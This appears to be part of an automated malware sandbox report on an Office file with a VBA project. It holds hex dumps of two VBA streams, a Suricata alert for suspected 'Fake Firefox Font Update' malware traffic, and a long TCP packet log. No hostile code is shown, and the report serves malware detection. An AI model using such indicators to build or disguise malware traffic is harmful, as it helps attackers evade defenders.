Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
CLSID:
File Type:	data
Stream Size:	140
Entropy:	1.963193181149096
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 24 00 a9 00 00 00 00 00 02 00 01 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 474

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	474
Entropy:	6.186533047263901
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 J . . . H . . H . . " . . H . . . . d . . . . . . . V B A P @ r o j e c t . . D . @ . & . . . . . = . . . . r . . . . . . . . 5 M i . . . . J . < . . . . 9 s t d o . l e > . . s . t . . d . o . l . e . ( . . h . % ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ . W i n d o w s \\ . S y s W O W 6 4 . \\ . e 2 . t l b # . O L E A u t o m a t i o n . 0 . . A E O f f i c E O D . f . i . c E . . . E 2 D F 8 . D 0 4 C - 5 B F . A - 1 0 1 B - B H D E
Data Raw:	01 d6 b1 80 01 00 04 00 00 00 01 00 30 aa 4a 02 90 05 00 48 02 02 48 09 00 c0 22 14 06 48 03 00 02 00 64 e4 04 08 04 00 0a 00 1c 56 42 41 50 40 72 6f 6a 65 63 74 01 bc 00 44 00 40 00 26 00 00 06 02 0a 3d ad 02 0a 07 02 72 01 14 08 06 12 09 02 12 80 c2 35 4d 69 05 00 0c 02 4a 0a 3c 02 0a 16 02 39 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 25

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-20T09:18:18.089586+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49716	13.107.246.42	443	TCP
2024-11-20T09:18:22.918256+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.16	49717	13.107.246.42	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 09:18:17.435281992 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:17.435354948 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:17.435446024 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:17.435770988 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:17.435790062 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.089193106 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.089586020 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.091348886 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.091358900 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.091670990 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.093786001 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.135324001 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.204123020 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.204180956 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.204224110 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.204282045 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.204298019 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.204319000 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.204415083 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.281267881 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.281301022 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.281433105 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.281457901 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.281625986 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.283852100 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.283870935 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.285365105 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.285372019 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.285459995 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.367724895 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.367752075 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.367861032 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.367885113 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.367993116 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.369100094 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.369117022 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.370795965 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.370865107 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.370865107 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.370877981 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.372565031 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.372581959 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.372641087 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.372641087 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.372648001 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.419667006 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.457814932 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.457842112 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.457917929 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.457946062 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.458044052 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.458693981 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.458712101 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.458766937 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.458781958 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.458867073 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.459975004 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.459991932 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.460050106 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.460064888 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.460203886 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.461750031 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.461769104 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.461847067 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.461847067 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.461858034 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.462863922 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.462882042 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.462918997 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.462918997 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.462928057 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.462990046 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.462990046 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.464129925 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.464144945 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.464401960 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.464411974 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.464514971 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.466207027 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.466223955 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.466279984 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.466298103 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.466404915 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.534385920 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.534471989 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.534495115 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.534513950 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.534554005 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.542685986 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.542721987 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.542772055 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.542789936 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.542829990 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.542829990 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.543543100 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.543560982 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.543613911 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.543627024 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.543711901 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.544475079 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.544491053 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.544545889 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.544559002 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.544648886 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.545236111 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.545250893 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.545305967 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.545317888 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.545393944 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.550451994 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.550476074 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.550545931 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.550553083 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.550663948 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.551194906 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.551238060 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.551276922 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.551281929 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.551311016 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.551330090 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.551791906 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.551821947 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.551856041 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.551867008 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.551915884 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.551915884 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.621922016 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.621947050 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.622075081 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.622102976 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.622256041 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.630199909 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.630222082 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.630294085 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.630320072 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.630372047 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.630703926 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.630719900 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.630759954 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.630772114 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.630816936 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.630816936 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.631444931 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.631469011 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.631536007 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.631550074 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.631644011 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.631901026 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.631916046 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.631964922 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.631977081 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.632061005 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.632618904 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.632637978 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.632690907 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.632704973 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.632788897 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.633112907 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.633126974 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.633171082 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.633182049 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.633265972 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.634001970 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.634016991 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.634072065 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.634083033 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.634169102 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.707834005 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.707865953 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.708158016 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.708169937 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.708226919 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.716269016 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.716290951 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.716377974 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.716391087 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.716614008 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.716634989 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.716670990 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.716670990 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.716677904 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.716739893 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.716739893 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.717073917 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.717089891 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.717174053 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.717180014 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.717222929 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.717468023 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.717483997 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.717547894 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.717559099 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.717611074 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.717892885 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.717912912 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.717976093 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.717988014 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.718367100 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.718466997 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.718485117 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.718549967 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.718561888 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.718661070 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.718825102 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.718841076 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.718903065 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.718914986 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.719003916 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.794648886 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.794677973 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.794778109 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.794790983 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.794831038 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.803028107 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803045988 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803137064 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.803143024 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803196907 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.803386927 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803401947 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803463936 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.803469896 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803564072 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.803797960 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803812027 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803858995 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.803864002 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.803905964 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.804409027 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.804425955 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.804481983 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.804487944 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.804524899 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.808094025 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808121920 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808187008 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.808195114 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808217049 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.808239937 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.808315039 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808331013 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808384895 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.808391094 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808440924 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.808479071 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808494091 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808552027 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.808559895 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.808574915 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.808631897 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.881788969 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.881817102 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.881926060 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.881939888 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.881978989 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.891527891 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.891551018 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.891665936 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.891679049 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.891731977 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.892152071 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.892168999 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.892220020 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.892225027 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.892257929 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.892690897 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.892707109 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.892744064 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.892749071 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.892776966 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.892798901 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.893083096 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.893101931 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.893156052 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.893161058 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.893203020 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.893755913 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.893774033 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.893812895 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.893822908 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.893848896 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.893870115 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.894104958 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.894123077 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.894177914 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.894182920 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.894226074 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.894622087 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.894639015 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.894696951 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.894702911 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.894748926 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.970006943 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.970041037 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.970156908 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.970170021 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.970215082 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.978826046 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.978852987 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.978951931 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.978961945 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.979011059 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.979362011 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.979378939 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.979432106 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.979439020 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.979480982 CET	49716	443	192.168.2.16	13.107.246.42
